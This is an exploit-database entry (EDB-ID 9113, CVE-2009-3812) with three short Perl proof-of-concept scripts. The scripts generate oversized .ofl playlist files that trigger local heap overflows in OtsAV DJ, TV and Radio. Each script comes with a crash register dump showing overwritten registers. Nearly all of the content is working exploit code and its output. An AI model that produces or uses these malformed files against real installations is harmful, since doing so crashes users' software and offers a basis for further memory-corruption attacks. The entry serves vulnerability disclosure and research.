Exploit otsAV DJ/TV/Radio - Multiple Local Heap Overflows (PoC)

[Exploiter]

EDB-ID

9113

Проверка EDB

1. Пройдено

Автор

STACK

Тип уязвимости

DOS

Платформа

WINDOWS

CVE

cve-2009-3812

Дата публикации

2009-07-10

----------------------------------the first Poc------------------------------------
#!/usr/bin/perl
# OtsAv DJ [.olf] Local Heap Overflow Poc
# Down : http://serv-08.download.otszone.com/download.cgi/otsavdjtrialsetup.exe?A=13JTHRVWJLLLZ5JG2AYRNSMN%2DWJMQXDJKA%2DRFQ&otsavdjtrialsetup.exe
# Desc : 7000 A' Heap overflow
# By Mountassif Moad a.k.a Stack
# v4 Team & evil finger
# Open Stack.ofl >> File >>  Import List   >> As playlist  >>
# BOOOOOOOOOOOOOOOOOOOM
# register of 7000 A'
# EAX 41414141
# ECX 00E5448C OtsAVDJt.00E5448C
# EDX 41414141
# EBX 00E54488 OtsAVDJt.00E54488
# ESP 02C6FE1C
# EBP 00E0D328 OtsAVDJt.00E0D328
# ESI 00000000
# EDI 0174C070 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# EIP 0046266C OtsAVDJt.0046266C
# register of 2000 A'
# EAX 41414141
# ECX 00001B05
# EDX 02FAF730
# EBX 0000042A
# ESP 02FAF9C8
# EBP 00000000
# ESI 020FAFEA
# EDI 02FAFEAA
# EIP 0043C8D7 OtsAVDJt.0043C8D7
use strict;
use warnings;
my $A= "\x41" x 7000;
open(my $ofl_playlist, "> stack.ofl");
print $ofl_playlist
                    $A.
                    "\r\n";
close $ofl_playlist;
-------------------------------Second Poc-----------------------------------------------------

#!/usr/bin/perl
# OtsAv TV [.olf] Local Heap Overflow Poc
# Down : http://www.otsav.com/buy/tv/
# Desc : 2000 A' Heap overflow
# By Mountassif Moad a.k.a Stack
# v4 Team & evil finger
# Open Stack.ofl >> File >>  Import List   >> As playlist  >>
# BOOOOOOOOOOOOOOOOOOOM
# EAX 45454545
# ECX 00009AF0
# EDX 03A0F730
# EBX 0000042A
# ESP 03A0F9C8
# EBP 00000000
# ESI 02CD7102
# EDI 03A0FEAA
# EIP 0043C8D7 OtsAVTVt.0043C8D7
use strict;
use warnings;
my $A= "\x45" x 2000;
open(my $ofl_playlist, "> stack.ofl");
print $ofl_playlist
                    $A.
                    "\r\n";
close $ofl_playlist;
----------------------------------- 3 POC-------------------------------------------------
#!/usr/bin/perl
# OtsAv Radio [.olf] Local Heap Overflow Poc
# Down : http://www.otsav.com/buy/radio/
# Desc : 2000 A' Heap overflow
# By Mountassif Moad a.k.a Stack
# v4 Team & evil finger
# Open Stack.ofl >> File >>  Import List   >> As playlist  >>
# BOOOOOOOOOOOOOOOOOOOM
# EAX 45454545
# ECX 0000CD32
# EDX 0224F730
# EBX 00000452
# ESP 0224F9C8
# EBP 00000000
# ESI 00C8E0EA
# EDI 0224FED2
# EIP 0043B497 OtsAVRDt.0043B497
use strict;
use warnings;
my $A= "\x45" x 2000;
open(my $ofl_playlist, "> stack.ofl");
print $ofl_playlist
                    $A.
                    "\r\n";
close $ofl_playlist;

# milw0rm.com [2009-07-10]